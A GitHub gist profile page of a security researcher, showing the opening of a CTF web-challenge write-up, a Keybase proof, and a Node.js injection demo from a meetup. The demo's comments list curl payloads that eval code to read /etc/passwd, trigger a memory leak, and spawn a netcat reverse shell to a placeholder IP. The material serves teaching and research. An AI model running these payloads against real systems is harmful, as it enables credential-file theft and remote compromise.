Skip to content

Instantly share code, notes, and snippets.

Renato Rodrigues Simpsonpt

View GitHub Profile
Simpsonpt /
Last active Mar 20, 2019
H1-702-CTF Write-up.

During the C-Days18 conference André (@0xACB) and Zé (@JLLiS) CTF junkies teased me to participate in H1CTF18. At first, I wasn't entirely convinced since it had already been running for a few days. Nevertheless, I decided to have a crack at it.

The web challenge starts with a simple visit to an endpoint on that is running a webpage with the following title "Notes RPC Capture The Flag" and in the body " ...somewhere on this server, a service can be found that allows a user to securely stores notes. In one of the notes, a flag is hidden."

Without a shadow of a doubt; I must find a way to interact with that note service.

1 - Recon Phase

As always recon is the first thing to do. I started with the browser. After opening the page, I turned to the network tab on the Developer Tools and went through to the response headers, where I got "Apache/2.4.18 (Ubuntu)".

My first attempt was looking for "/server-status/" since the ([status

Simpsonpt / nodejs-ssjs-nodebleed.js
Created Mar 11, 2016
Demo from 0xOPOSEC Meetup - Node.js Problems in Paradise -
View nodejs-ssjs-nodebleed.js
* NodeBleed Original Bug:
* PoC: $ node nodejs-ssjs-nodebleed.js
* "Attack":
* - Direct Eval: $ curl http://localhost:8080/ -X POST -H "Content-Type: application/json" --data "res.end(require('fs').readFileSync('/etc/passwd', {encoding:'UTF-8'}))"
* - JSON Abuse: $ curl http://localhost:8080/ -X POST -H "Content-Type: application/json" --data "{\"str\":"1000",\"injection\":\"require('fs').readFileSync('/etc/passwd', {encoding:'UTF-8'})\"}"
* - NodeBleed: $ curl http://localhost:8080/ -X POST -H "Content-Type: application/json" --data "{\"str\":1000,\"injection\":\"\"}" | hexdump -C
* Insecure evals Payloads:
* - --data "{\"str\": \"1000\",\"injection\":\"require('child_process').exec('netcat -e /bin/sh IP 9999')\"}" ($ netcat -l -p 9999)

Keybase proof

I hereby claim:

  • I am simpsonpt on github.
  • I am simpson ( on keybase.
  • I have a public key whose fingerprint is B26B 73BB 59DD E5A8 61C8 F93F 2891 9723 6299 DBBE

To claim this, I am signing this object:

You can’t perform that action at this time.